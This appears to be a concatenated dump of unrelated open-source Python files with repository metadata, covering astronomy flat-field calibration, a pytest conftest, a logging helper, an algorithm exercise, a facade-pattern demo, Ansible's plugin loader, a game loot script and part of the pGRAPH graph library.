answ = 'y'
except:
print '\n### warning'
answ = 'n'
else:
print '\n### select the std star'
display_image(lista2[i], 1, '', '', False)
iraf.image.tv.imexamine(lista2[
i], 1, logfile='tmpone.coo', keeplog='yes', xformat='', yformat='', wcs='logical')
xycoo = iraf.proto.fields('tmpone.coo', '1,2', Stdout=1)
x2, y2 = string.split(xycoo[0])
f = open('tmpone.coo', 'w')
f.write(str(x2) + ' ' + str(y2) + '\n')
f.close()
delete('pippo.' + str(j) + '.mag')
print '###### new selection ' + str(x2), str(y2)
gggg = iraf.digiphot.daophot.phot(
lista2[i], "tmpone.coo", output='pippo.' + str(j) + '.mag', verify='no', interac='no', Stdout=1)
try:
float(string.split(gggg[0])[3])
answ = 'y'
except:
print '\n### warning'
answ = 'n'
os.system('ls pippo.*.mag > tempmag.lst')
tmptbl0 = iraf.txdump(textfile="@tempmag.lst",
fields="XCENTER,YCENTER,FLUX", expr='yes', Stdout=1)
ff = open('magnitudini', 'w')
for i in tmptbl0:
ff.write(i + '\n')
ff.close()
# delete the temporary images and files
delete("temp*.fits")
delete('temp*.lst')
delete(illum_frame)
print '\n### fitting the illumination surface...'
aaa = iraf.utilities.surfit('magnitudini', image=illum_frame, function="polynomial",
xorder=2, yorder=2, xterms="full", ncols=1024, nlines=1024, Stdout=1)
iraf.noao.imred.generic.normalize(illum_frame)
correctcard(lista[0])
data, hdr = pyfits.getdata(illum_frame, 0, header=True)
data0, hdr0 = pyfits.getdata(lista[0], 0, header=True)
delete(illum_frame)
pyfits.writeto(illum_frame, float32(data), hdr0)
flatfield0 = string.split(flatfield, '/')[-1]
ntt.util.updateheader(
illum_frame, 0, {'MKILLUM': [flatfield0, 'flat field']})
display_image(illum_frame, 1, '', '', False)
for i in range(0, len(lista)): # in lista:
img = lista[i]
delete('pippo.' + str(i) + '.mag')
delete('C' + img)
delete('C' + re.sub('.fits', '_sky.fits', img))
# delete('C*.fits.mag.1')
# iraf.hedit(illum_frame,'MKILLUM','Illum. corr. created '+flatfield,add='yes',update='yes',verify='no')
return illum_frame
###############################################################################
# select files
def doflatsofi(flats, _doflat, illum, _output):
# print "LOGX:: Entering `doflatsofi` method/function in %(__file__)s" %
# globals()
import ntt
from ntt.util import display_image, delete, searchflat, name_duplicate
from pyraf import iraf
import glob
import string
onofflimit = {'J': 1000, 'H': 1000, 'Ks': 5000}
masklimit = {'J': {'ON': 1000, 'OFF': 30}, 'H': {
'ON': 1000, 'OFF': 40}, 'Ks': {'ON': 1000, 'OFF': 1000}}
if flats and _doflat:
listaflat = []
for _filter in flats:
for ID in flats[_filter]:
images = flats[_filter][ID]
if len(images) == 8:
mflat = makeflat(images)
listaflat.append(mflat)
display_image(mflat, 1, '', '', False)
raw_input('go on ')
elif len(images) != 8: # % 8 == 0:
                    print '\n### to compute a flat field you need a sequence of 8 calibration files in the following order:'
print 'OFF OFFMASK ONMASK ON ON ONMASK OFFMASK OFF\n'
print len(images), _filter, ID
tipo = ['OFF', 'OFFMASK', 'ONMASK', 'ON',
'ON', 'ONMASK', 'OFFMASK', 'OFF']
listtmp = []
ii = 0
nn = 0
for img in images:
onoffvalue = float(string.split(iraf.imstat(
img + '[500:600,900:1000]', Stdout=1)[1])[2])
maskvalue = float(string.split(iraf.imstat(
img + '[100:200,900:1000]', Stdout=1)[1])[2])
if onoffvalue >= onofflimit[_filter]:
onoff = 'ON'
else:
onoff = 'OFF'
if maskvalue >= masklimit[_filter][onoff]:
mask = 'none'
else:
mask = 'MASK'
# display_image(img,1,'','',False)
print onoff, mask, onoffvalue, maskvalue, img, tipo[nn]
for img in images:
onoffvalue = float(string.split(iraf.imstat(
img + '[500:600,900:1000]', Stdout=1)[1])[2])
maskvalue = float(string.split(iraf.imstat(
img + '[100:200,900:1000]', Stdout=1)[1])[2])
if onoffvalue >= onofflimit[_filter]:
onoff = 'ON'
else:
onoff = 'OFF'
if maskvalue >= masklimit[_filter][onoff]:
mask = 'none'
else:
mask = 'MASK'
display_image(img, 1, '', '', False)
print onoff, mask, onoffvalue, maskvalue, img, tipo[nn]
answ = raw_input('ok [[y]/n/r/s] ? ')
if not answ:
answ = 'y'
if answ == 'y':
listtmp.append(img)
ii = ii + 1
nn = nn + 1
if len(listtmp) == 8:
print '### number images selected: ', str(len(listtmp))
mflat = ntt.soficalibdef.makeflat(listtmp)
listaflat.append(mflat)
display_image(mflat, 1, '', '', False)
nn = 0
listtmp = []
elif answ == 'r':
listtmp = []
ii = 0
nn = 0
elif answ == 's':
break
else:
print len(images), _filter, ID
print '### number images selected: ', str(len(listtmp))
else:
listaflat = flats
listaillum = []
if illum:
for _filter in illum:
for ID in illum[_filter]:
images = illum[_filter][ID]
flatfield = searchflat(images[0], listaflat)[0]
if flatfield:
illum_frame = ntt.soficalibdef.makeillumination(
images, flatfield)
listaillum.append(illum_frame)
else:
print 'flat field not found'
for img in listaflat:
try:
ntt.util.phase3header(img) # phase 3 definitions
ntt.util.updateheader(
img, 0, {'BUNIT': ['ADU', 'pixel units(ADU,electrons)']})
ntt.util.updateheader(
img, 0, {'FILETYPE': [31202, 'flat field']})
except:
print '\n### problems with phase 3 definitions'
for img in listaillum:
try:
ntt.util.phase3header(img) # phase 3 definitions
ntt.util.updateheader(
img, 0, {'BUNIT': ['ADU', 'pixel units(ADU,electrons)']})
ntt.util.updateheader(
img, 0, {'FILETYPE': [31213, 'illum corr frames']})
except:
print '\n### problems with phase 3 definitions'
return listaflat, listaillum
###########################################################################
|
svalenti/pessto
|
trunk/src/ntt/soficalibdef.py
|
Python
|
mit
| 18,166
|
# -*- coding: utf-8 -*-
"""
################################################################################
# #
# media_editing #
# #
################################################################################
# #
# LICENCE INFORMATION #
# #
# This program provides media editing utilities. #
# #
# copyright (C) 2018 Will Breaden Madden, wbm@protonmail.ch #
# #
# This software is released under the terms of the GNU General Public License #
# version 3 (GPLv3). #
# #
# This program is free software: you can redistribute it and/or modify it #
# under the terms of the GNU General Public License as published by the Free #
# Software Foundation, either version 3 of the License, or (at your option) #
# any later version. #
# #
# This program is distributed in the hope that it will be useful, but WITHOUT #
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or #
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for #
# more details. #
# #
# For a copy of the GNU General Public License, see #
# <http://www.gnu.org/licenses/>. #
# #
################################################################################
"""
|
wdbm/media_editing
|
media_editing.py
|
Python
|
gpl-3.0
| 2,382
|
import pytest
from tests.plugins.upload_to_s3 import upload_file_to_s3_by_job_id
pytest_plugins = (
"tests.examples.examples_report_plugin",
"tests.integration.integration_tests_plugin",
"tests.plugins.bokeh_server",
"tests.plugins.image_diff",
"tests.plugins.jupyter_notebook",
"tests.plugins.file_server",
"tests.plugins.phantomjs_screenshot",
)
def pytest_addoption(parser):
parser.addoption(
"--upload", dest="upload", action="store_true", default=False, help="upload test artefacts to S3"
)
parser.addoption(
"--log-file", dest="log_file", metavar="path", action="store", default='examples.log', help="where to write the complete log"
)
def pytest_sessionfinish(session, exitstatus):
try_upload = session.config.option.upload
seleniumreport = session.config.option.htmlpath
is_slave = hasattr(session.config, 'slaveinput')
if try_upload and seleniumreport and not is_slave:
upload_file_to_s3_by_job_id(seleniumreport, "text/html", "INTEGRATION TESTS REPORT")
@pytest.yield_fixture(scope="session")
def log_file(request):
is_slave = hasattr(request.config, 'slaveinput')
if not is_slave:
with open(request.config.option.log_file, 'w') as f:
# Clean-out any existing log-file
f.write("")
    with open(request.config.option.log_file, 'a') as f:
yield f
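# Illustrative invocation (assumption, not taken from the original file):
# the options registered above would be used as, e.g.,
#   pytest --upload --log-file=integration.log tests/integration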
|
philippjfr/bokeh
|
tests/conftest.py
|
Python
|
bsd-3-clause
| 1,395
|
# -*- coding: utf-8 -*-
# Copyright © 2012 Peter Schnebel <pschnebel@gmx.de>
# This file is part of python-ads.
#
# python-ads is free software: you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free
# Software Foundation, either version 3 of the License, or (at your option)
# any later version.
#
# python-ads is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
# more details.
#
# You should have received a copy of the GNU General Public License along with
# python-ads. If not, see <http://www.gnu.org/licenses/>.
# FIXME: prepare logging stuff here?
import logging
class Log(object):
def __init__(self, module):
self._logger = logging.getLogger("%s" % module.ljust(12))
class Logger(object):
__logger = None
@staticmethod
def set_logger(logger): Logger.__logger = logger
@staticmethod
def info(msg): Logger.__logger.info(msg)
@staticmethod
def debug(msg): Logger.__logger.debug(msg)
@staticmethod
def error(msg): Logger.__logger.error(msg)
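# Hedged usage sketch (illustrative comments, not part of the original
# file): Logger is a static facade, so a concrete logger must be installed
# before the logging methods are used, e.g.:
#   Logger.set_logger(logging.getLogger("ads"))
#   Logger.info("connection established")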
# vim: set ai ts=2 sw=2 sts=2 expandtab:
# eof
|
pscn/ads
|
src/log.py
|
Python
|
gpl-3.0
| 1,254
|
def max_rectangle(heights):
    # Largest rectangle in a histogram, using a monotonic stack of indices:
    # bars stay on the stack while heights are non-decreasing; when a lower
    # bar arrives, each popped bar is the limiting height of a rectangle
    # whose width runs back to the previous (still lower) stacked bar.
    res = 0
    heights.append(0)  # sentinel: flushes everything left on the stack
    stack = [0]
    for i in range(1, len(heights)):
        while stack and heights[i] < heights[stack[-1]]:
            h = heights[stack.pop()]
            w = i if not stack else i - stack[-1] - 1
            res = max(res, h * w)
        stack.append(i)
    return res
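# Worked example (illustrative comment, not in the original): for
# heights = [2, 1, 5, 6, 2, 3] the scan pops the 6-bar at width 1 and then
# the 5-bar at width 2, so max_rectangle returns 5 * 2 = 10.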
class Solution:
def maximalRectangle(self, matrix):
"""
:type matrix: List[List[str]]
:rtype: int
"""
if not matrix or not matrix[0]:
return 0
m = len(matrix)
n = len(matrix[0])
heights = [1 if x == '1' else 0 for x in matrix[0]]
ans = max_rectangle(heights)
for i in range(1, m):
for j in range(n):
heights[j] = 0 if matrix[i][j] == '0' else heights[j] + 1
ans = max(ans, max_rectangle(heights))
return ans
if __name__ == "__main__":
sol = Solution()
M = [['1', '0', '1', '0', '0'],
['1', '0', '1', '1', '1'],
['1', '1', '1', '1', '1'],
['1', '0', '0', '1', '0']]
print(sol.maximalRectangle(M))
|
shenfei/oj_codes
|
leetcode/python/n85_Maximal_Rectangle.py
|
Python
|
mit
| 1,123
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import time
SLEEP = 0.5
# Complex Parts
class TC1:
def run(self):
print("###### In Test 1 ######")
time.sleep(SLEEP)
print("Setting up")
time.sleep(SLEEP)
print("Running test")
time.sleep(SLEEP)
print("Tearing down")
time.sleep(SLEEP)
print("Test Finished\n")
class TC2:
def run(self):
print("###### In Test 2 ######")
time.sleep(SLEEP)
print("Setting up")
time.sleep(SLEEP)
print("Running test")
time.sleep(SLEEP)
print("Tearing down")
time.sleep(SLEEP)
print("Test Finished\n")
class TC3:
def run(self):
print("###### In Test 3 ######")
time.sleep(SLEEP)
print("Setting up")
time.sleep(SLEEP)
print("Running test")
time.sleep(SLEEP)
print("Tearing down")
time.sleep(SLEEP)
print("Test Finished\n")
# Facade
class TestRunner:
def __init__(self):
self.tc1 = TC1()
self.tc2 = TC2()
self.tc3 = TC3()
self.tests = [self.tc1, self.tc2, self.tc3]
    def runAll(self):
        for test in self.tests:
            test.run()
# Client
if __name__ == '__main__':
testrunner = TestRunner()
testrunner.runAll()
### OUTPUT ###
# ###### In Test 1 ######
# Setting up
# Running test
# Tearing down
# Test Finished
#
# ###### In Test 2 ######
# Setting up
# Running test
# Tearing down
# Test Finished
#
# ###### In Test 3 ######
# Setting up
# Running test
# Tearing down
# Test Finished
#
|
NicovincX2/Python-3.5
|
Génie logiciel/Architecture logicielle/Patron de conception/Patron de structure/facade.py
|
Python
|
gpl-3.0
| 1,596
|
# (c) 2012, Daniel Hokka Zakrisson <daniel@hozac.com>
# (c) 2012-2014, Michael DeHaan <michael.dehaan@gmail.com> and others
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import glob
import imp
import inspect
import os
import os.path
import sys
import warnings
from collections import defaultdict
from ansible import constants as C
try:
from __main__ import display
except ImportError:
from ansible.utils.display import Display
display = Display()
# Global so that all instances of a PluginLoader will share the caches
MODULE_CACHE = {}
PATH_CACHE = {}
PLUGIN_PATH_CACHE = {}
def get_all_plugin_loaders():
return [(name, obj) for (name, obj) in inspect.getmembers(sys.modules[__name__]) if isinstance(obj, PluginLoader)]
class PluginLoader:
'''
PluginLoader loads plugins from the configured plugin directories.
It searches for plugins by iterating through the combined list of
play basedirs, configured paths, and the python path.
The first match is used.
'''
def __init__(self, class_name, package, config, subdir, aliases={}, required_base_class=None):
self.class_name = class_name
self.base_class = required_base_class
self.package = package
self.config = config
self.subdir = subdir
self.aliases = aliases
        if class_name not in MODULE_CACHE:
            MODULE_CACHE[class_name] = {}
        if class_name not in PATH_CACHE:
            PATH_CACHE[class_name] = None
        if class_name not in PLUGIN_PATH_CACHE:
            PLUGIN_PATH_CACHE[class_name] = defaultdict(dict)
self._module_cache = MODULE_CACHE[class_name]
self._paths = PATH_CACHE[class_name]
self._plugin_path_cache = PLUGIN_PATH_CACHE[class_name]
self._extra_dirs = []
self._searched_paths = set()
def __setstate__(self, data):
'''
Deserializer.
'''
class_name = data.get('class_name')
package = data.get('package')
config = data.get('config')
subdir = data.get('subdir')
aliases = data.get('aliases')
base_class = data.get('base_class')
PATH_CACHE[class_name] = data.get('PATH_CACHE')
PLUGIN_PATH_CACHE[class_name] = data.get('PLUGIN_PATH_CACHE')
self.__init__(class_name, package, config, subdir, aliases, base_class)
self._extra_dirs = data.get('_extra_dirs', [])
self._searched_paths = data.get('_searched_paths', set())
def __getstate__(self):
'''
Serializer.
'''
return dict(
class_name = self.class_name,
base_class = self.base_class,
package = self.package,
config = self.config,
subdir = self.subdir,
aliases = self.aliases,
_extra_dirs = self._extra_dirs,
_searched_paths = self._searched_paths,
PATH_CACHE = PATH_CACHE[self.class_name],
PLUGIN_PATH_CACHE = PLUGIN_PATH_CACHE[self.class_name],
)
def print_paths(self):
''' Returns a string suitable for printing of the search path '''
# Uses a list to get the order right
ret = []
for i in self._get_paths():
if i not in ret:
ret.append(i)
return os.pathsep.join(ret)
def _all_directories(self, dir):
results = []
results.append(dir)
for root, subdirs, files in os.walk(dir):
if '__init__.py' in files:
for x in subdirs:
results.append(os.path.join(root,x))
return results
def _get_package_paths(self):
''' Gets the path of a Python package '''
paths = []
if not self.package:
return []
if not hasattr(self, 'package_path'):
m = __import__(self.package)
parts = self.package.split('.')[1:]
self.package_path = os.path.join(os.path.dirname(m.__file__), *parts)
paths.extend(self._all_directories(self.package_path))
return paths
def _get_paths(self):
''' Return a list of paths to search for plugins in '''
if self._paths is not None:
return self._paths
ret = self._extra_dirs[:]
# look in any configured plugin paths, allow one level deep for subcategories
if self.config is not None:
configured_paths = self.config.split(os.pathsep)
for path in configured_paths:
path = os.path.realpath(os.path.expanduser(path))
contents = glob.glob("%s/*" % path) + glob.glob("%s/*/*" % path)
for c in contents:
if os.path.isdir(c) and c not in ret:
ret.append(c)
if path not in ret:
ret.append(path)
# look for any plugins installed in the package subtree
ret.extend(self._get_package_paths())
        # HACK: because powershell modules live in the same directory
        # hierarchy as other modules we have to process them last. This is
        # because powershell only works on Windows while the other modules
        # work anywhere (possibly including Windows, if the correct language
        # interpreter is installed). The non-powershell modules can have any
        # file extension, so powershell modules would otherwise be picked up
        # along with them. The non-hack way to fix this is to give powershell
        # modules a separate PluginLoader/ModuleLoader, but that requires
        # changing other things too (known things to change would be
        # PATHS_CACHE, PLUGIN_PATHS_CACHE, and MODULE_CACHE). Since those
        # three dicts key on the class_name, and neither regular modules nor
        # powershell modules have class_names, they would not work as written.
reordered_paths = []
win_dirs = []
for path in ret:
if path.endswith('windows'):
win_dirs.append(path)
else:
reordered_paths.append(path)
reordered_paths.extend(win_dirs)
# cache and return the result
self._paths = reordered_paths
return reordered_paths
def add_directory(self, directory, with_subdir=False):
''' Adds an additional directory to the search path '''
directory = os.path.realpath(directory)
if directory is not None:
if with_subdir:
directory = os.path.join(directory, self.subdir)
if directory not in self._extra_dirs:
# append the directory and invalidate the path cache
self._extra_dirs.append(directory)
self._paths = None
def find_plugin(self, name, mod_type=''):
''' Find a plugin named name '''
# The particular cache to look for modules within. This matches the
# requested mod_type
pull_cache = self._plugin_path_cache[mod_type]
try:
return pull_cache[name]
except KeyError:
# Cache miss. Now let's find the plugin
pass
if mod_type:
suffix = mod_type
elif self.class_name:
# Ansible plugins that run in the controller process (most plugins)
suffix = '.py'
else:
# Only Ansible Modules. Ansible modules can be any executable so
# they can have any suffix
suffix = ''
### FIXME:
# Instead of using the self._paths cache (PATH_CACHE) and
# self._searched_paths we could use an iterator. Before enabling that
# we need to make sure we don't want to add additional directories
# (add_directory()) once we start using the iterator. Currently, it
# looks like _get_paths() never forces a cache refresh so if we expect
# additional directories to be added later, it is buggy.
for path in (p for p in self._get_paths() if p not in self._searched_paths and os.path.isdir(p)):
try:
full_paths = (os.path.join(path, f) for f in os.listdir(path))
            except OSError as e:
                display.warning("Error accessing plugin paths: %s" % str(e))
                continue
for full_path in (f for f in full_paths if os.path.isfile(f) and not f.endswith('__init__.py')):
full_name = os.path.basename(full_path)
# HACK: We have no way of executing python byte
# compiled files as ansible modules so specifically exclude them
if full_path.endswith(('.pyc', '.pyo')):
continue
splitname = os.path.splitext(full_name)
base_name = splitname[0]
try:
extension = splitname[1]
except IndexError:
extension = ''
# Module found, now enter it into the caches that match
# this file
if base_name not in self._plugin_path_cache['']:
self._plugin_path_cache[''][base_name] = full_path
if full_name not in self._plugin_path_cache['']:
self._plugin_path_cache[''][full_name] = full_path
if base_name not in self._plugin_path_cache[extension]:
self._plugin_path_cache[extension][base_name] = full_path
if full_name not in self._plugin_path_cache[extension]:
self._plugin_path_cache[extension][full_name] = full_path
self._searched_paths.add(path)
try:
return pull_cache[name]
except KeyError:
# Didn't find the plugin in this directory. Load modules from
# the next one
pass
# if nothing is found, try finding alias/deprecated
if not name.startswith('_'):
alias_name = '_' + name
# We've already cached all the paths at this point
if alias_name in pull_cache:
if not os.path.islink(pull_cache[alias_name]):
display.deprecated('%s is kept for backwards compatibility '
'but usage is discouraged. The module '
'documentation details page may explain '
'more about this rationale.' %
name.lstrip('_'))
return pull_cache[alias_name]
return None
def has_plugin(self, name):
''' Checks if a plugin named name exists '''
return self.find_plugin(name) is not None
__contains__ = has_plugin
def _load_module_source(self, name, path):
with open(path, 'r') as module_file:
module = imp.load_source(name, path, module_file)
return module
def get(self, name, *args, **kwargs):
''' instantiates a plugin of the given name using arguments '''
if name in self.aliases:
name = self.aliases[name]
path = self.find_plugin(name)
if path is None:
return None
if path not in self._module_cache:
self._module_cache[path] = self._load_module_source('.'.join([self.package, name]), path)
if kwargs.get('class_only', False):
obj = getattr(self._module_cache[path], self.class_name)
else:
obj = getattr(self._module_cache[path], self.class_name)(*args, **kwargs)
if self.base_class and self.base_class not in [base.__name__ for base in obj.__class__.__bases__]:
return None
return obj
def all(self, *args, **kwargs):
''' instantiates all plugins with the same arguments '''
for i in self._get_paths():
matches = glob.glob(os.path.join(i, "*.py"))
matches.sort()
for path in matches:
name, _ = os.path.splitext(path)
if '__init__' in name:
continue
if path not in self._module_cache:
with warnings.catch_warnings():
warnings.simplefilter("ignore", RuntimeWarning)
self._module_cache[path] = self._load_module_source(name, path)
if kwargs.get('class_only', False):
obj = getattr(self._module_cache[path], self.class_name)
else:
obj = getattr(self._module_cache[path], self.class_name)(*args, **kwargs)
if self.base_class and self.base_class not in [base.__name__ for base in obj.__class__.__bases__]:
continue
# set extra info on the module, in case we want it later
setattr(obj, '_original_path', path)
yield obj
action_loader = PluginLoader(
'ActionModule',
'ansible.plugins.action',
C.DEFAULT_ACTION_PLUGIN_PATH,
'action_plugins',
required_base_class='ActionBase',
)
cache_loader = PluginLoader(
'CacheModule',
'ansible.plugins.cache',
C.DEFAULT_CACHE_PLUGIN_PATH,
'cache_plugins',
)
callback_loader = PluginLoader(
'CallbackModule',
'ansible.plugins.callback',
C.DEFAULT_CALLBACK_PLUGIN_PATH,
'callback_plugins',
)
connection_loader = PluginLoader(
'Connection',
'ansible.plugins.connection',
C.DEFAULT_CONNECTION_PLUGIN_PATH,
'connection_plugins',
aliases={'paramiko': 'paramiko_ssh'},
required_base_class='ConnectionBase',
)
shell_loader = PluginLoader(
'ShellModule',
'ansible.plugins.shell',
'shell_plugins',
'shell_plugins',
)
module_loader = PluginLoader(
'',
'ansible.modules',
C.DEFAULT_MODULE_PATH,
'library',
)
lookup_loader = PluginLoader(
'LookupModule',
'ansible.plugins.lookup',
C.DEFAULT_LOOKUP_PLUGIN_PATH,
'lookup_plugins',
required_base_class='LookupBase',
)
vars_loader = PluginLoader(
'VarsModule',
'ansible.plugins.vars',
C.DEFAULT_VARS_PLUGIN_PATH,
'vars_plugins',
)
filter_loader = PluginLoader(
'FilterModule',
'ansible.plugins.filter',
C.DEFAULT_FILTER_PLUGIN_PATH,
'filter_plugins',
)
test_loader = PluginLoader(
'TestModule',
'ansible.plugins.test',
C.DEFAULT_TEST_PLUGIN_PATH,
'test_plugins'
)
fragment_loader = PluginLoader(
'ModuleDocFragment',
'ansible.utils.module_docs_fragments',
os.path.join(os.path.dirname(__file__), 'module_docs_fragments'),
'',
)
strategy_loader = PluginLoader(
'StrategyModule',
'ansible.plugins.strategy',
None,
'strategy_plugins',
required_base_class='StrategyBase',
)
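# Usage sketch (added illustration, not part of the original file). It
# assumes an Ansible 2.x checkout where the 'ansible' package and its
# bundled plugin trees are importable; the plugin names 'normal' and 'ssh'
# are the stock plugins shipped in that tree.
if __name__ == '__main__':
    # find_plugin() resolves a plugin name to a file path, filling the
    # per-suffix path caches as directories are scanned.
    print(action_loader.find_plugin('normal'))
    # Membership checks route through has_plugin()/__contains__.
    print('ssh' in connection_loader)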
|
fdupoux/ansible
|
lib/ansible/plugins/__init__.py
|
Python
|
gpl-3.0
| 15,547
|
def itemTemplate():
return ['object/tangible/loot/creature_loot/collections/shared_housing_improvement_04.iff']
def lootDescriptor():
return 'customattributes'
def customizationAttributes():
return ['/private/index_color_1']
def customizationValues():
return [9]
def STFparams():
return ['static_item_n','item_collection_housing_improvement_04_09','static_item_d','item_collection_housing_improvement_04_09']
def AddToCollection():
return 'housing_improvement_04'
def CollectionItemName():
return 'housing_improvement_04_09'
def stackable():
return 1
|
agry/NGECore2
|
scripts/loot/lootItems/collections/housing_improvements/cabinetry_techniques/cabinetry_techniques_9.py
|
Python
|
lgpl-3.0
| 600
|
#
# pGRAPH
# Copyright (C) 2006 Pedram Amini <pedram.amini@gmail.com>
#
# This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public
# License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later
# version.
#
# This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied
# warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along with this program; if not, write to the Free
# Software Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
'''
@author: Pedram Amini
@license: GNU General Public License 2.0 or later
@contact: pedram.amini@gmail.com
@organization: www.openrce.org
'''
import node
import edge
import cluster
import copy
class graph (object):
'''
@todo: Add support for clusters
@todo: Potentially swap node list with a node dictionary for increased performance
'''
####################################################################################################################
def __init__ (self, id = None):
'''
'''
self.id = id
self.clusters = []
self.edges = {}
self.nodes = {}
####################################################################################################################
def add_cluster (self, cluster):
'''
Add a pgraph cluster to the graph.
@type cluster: pGRAPH Cluster
@param cluster: Cluster to add to graph
'''
self.clusters.append(cluster)
return self
####################################################################################################################
def add_edge (self, edge, prevent_dups=True):
'''
Add a pgraph edge to the graph. Ensures a node exists for both the source and destination of the edge.
@type edge: pGRAPH Edge
@param edge: Edge to add to graph
@type prevent_dups: Boolean
@param prevent_dups: (Optional, Def=True) Flag controlling whether or not the addition of duplicate edges is ok
'''
if prevent_dups:
if self.edges.has_key(edge.id):
return self
# ensure the source and destination nodes exist.
if self.find_node("id", edge.src) and self.find_node("id", edge.dst):
self.edges[edge.id] = edge
return self
####################################################################################################################
def add_graph (self, other_graph):
'''
Alias of graph_cat(). Concatenate the other graph into the current one.
@todo: Add support for clusters
@see: graph_cat()
@type other_graph: pgraph.graph
@param other_graph: Graph to concatenate into this one.
'''
return self.graph_cat(other_graph)
####################################################################################################################
def add_node (self, node):
'''
Add a pgraph node to the graph. Ensures a node with the same id does not already exist in the graph.
@type node: pGRAPH Node
@param node: Node to add to graph
'''
node.number = len(self.nodes)
if not self.nodes.has_key(node.id):
self.nodes[node.id] = node
return self
####################################################################################################################
def del_cluster (self, id):
'''
Remove a cluster from the graph.
@type id: Mixed
@param id: Identifier of cluster to remove from graph
'''
for cluster in self.clusters:
if cluster.id == id:
self.clusters.remove(cluster)
break
return self
####################################################################################################################
def del_edge (self, id=None, src=None, dst=None):
'''
Remove an edge from the graph. There are two ways to call this routine, with an edge id::
graph.del_edge(id)
or by specifying the edge source and destination::
graph.del_edge(src=source, dst=destination)
@type id: Mixed
@param id: (Optional) Identifier of edge to remove from graph
@type src: Mixed
@param src: (Optional) Source of edge to remove from graph
@type dst: Mixed
@param dst: (Optional) Destination of edge to remove from graph
'''
if not id:
id = (src << 32) + dst
if self.edges.has_key(id):
del self.edges[id]
return self
####################################################################################################################
def del_graph (self, other_graph):
'''
Alias of graph_sub(). Remove the elements shared between the current graph and other graph from the current
graph.
@todo: Add support for clusters
@see: graph_sub()
@type other_graph: pgraph.graph
@param other_graph: Graph to diff/remove against
'''
return self.graph_sub(other_graph)
####################################################################################################################
def del_node (self, id):
'''
Remove a node from the graph.
        @type id: Mixed
        @param id: Identifier of node to remove from graph
'''
if self.nodes.has_key(id):
del self.nodes[id]
return self
####################################################################################################################
def edges_from (self, id):
'''
Enumerate the edges from the specified node.
@type id: Mixed
@param id: Identifier of node to enumerate edges from
@rtype: List
@return: List of edges from the specified node
'''
return [edge for edge in self.edges.values() if edge.src == id]
####################################################################################################################
def edges_to (self, id):
'''
Enumerate the edges to the specified node.
@type id: Mixed
@param id: Identifier of node to enumerate edges to
@rtype: List
@return: List of edges to the specified node
'''
return [edge for edge in self.edges.values() if edge.dst == id]
####################################################################################################################
def find_cluster (self, attribute, value):
'''
Find and return the cluster with the specified attribute / value pair.
@type attribute: String
@param attribute: Attribute name we are looking for
@type value: Mixed
@param value: Value of attribute we are looking for
@rtype: Mixed
@return: Cluster, if attribute / value pair is matched. None otherwise.
'''
for cluster in self.clusters:
if hasattr(cluster, attribute):
if getattr(cluster, attribute) == value:
return cluster
return None
####################################################################################################################
def find_cluster_by_node (self, attribute, value):
'''
Find and return the cluster that contains the node with the specified attribute / value pair.
@type attribute: String
@param attribute: Attribute name we are looking for
@type value: Mixed
@param value: Value of attribute we are looking for
@rtype: Mixed
@return: Cluster, if node with attribute / value pair is matched. None otherwise.
'''
for cluster in self.clusters:
for node in cluster:
if hasattr(node, attribute):
if getattr(node, attribute) == value:
return cluster
return None
####################################################################################################################
def find_edge (self, attribute, value):
'''
Find and return the edge with the specified attribute / value pair.
@type attribute: String
@param attribute: Attribute name we are looking for
@type value: Mixed
@param value: Value of attribute we are looking for
@rtype: Mixed
@return: Edge, if attribute / value pair is matched. None otherwise.
'''
# if the attribute to search for is the id, simply return the edge from the internal hash.
if attribute == "id" and self.edges.has_key(value):
return self.edges[value]
# step through all the edges looking for the given attribute/value pair.
else:
for edge in self.edges.values():
if hasattr(edge, attribute):
if getattr(edge, attribute) == value:
return edge
return None
####################################################################################################################
def find_node (self, attribute, value):
'''
Find and return the node with the specified attribute / value pair.
@type attribute: String
@param attribute: Attribute name we are looking for
@type value: Mixed
@param value: Value of attribute we are looking for
@rtype: Mixed
@return: Node, if attribute / value pair is matched. None otherwise.
'''
# if the attribute to search for is the id, simply return the node from the internal hash.
if attribute == "id" and self.nodes.has_key(value):
return self.nodes[value]
# step through all the nodes looking for the given attribute/value pair.
else:
for node in self.nodes.values():
if hasattr(node, attribute):
if getattr(node, attribute) == value:
return node
return None
####################################################################################################################
def graph_cat (self, other_graph):
'''
Concatenate the other graph into the current one.
@todo: Add support for clusters
@type other_graph: pgraph.graph
@param other_graph: Graph to concatenate into this one.
'''
for other_node in other_graph.nodes.values():
self.add_node(other_node)
for other_edge in other_graph.edges.values():
self.add_edge(other_edge)
return self
####################################################################################################################
def graph_down (self, from_node_id, max_depth=-1):
'''
Create a new graph, looking down, from the specified node id to the specified depth.
@type from_node_id: pgraph.node
@param from_node_id: Node to use as start of down graph
@type max_depth: Integer
@param max_depth: (Optional, Def=-1) Number of levels to include in down graph (-1 for infinite)
@rtype: pgraph.graph
@return: Down graph around specified node.
'''
down_graph = graph()
from_node = self.find_node("id", from_node_id)
if not from_node:
print "unable to resolve node %08x" % from_node_id
raise Exception
levels_to_process = []
current_depth = 1
levels_to_process.append([from_node])
for level in levels_to_process:
next_level = []
if current_depth > max_depth and max_depth != -1:
break
for node in level:
down_graph.add_node(copy.copy(node))
for edge in self.edges_from(node.id):
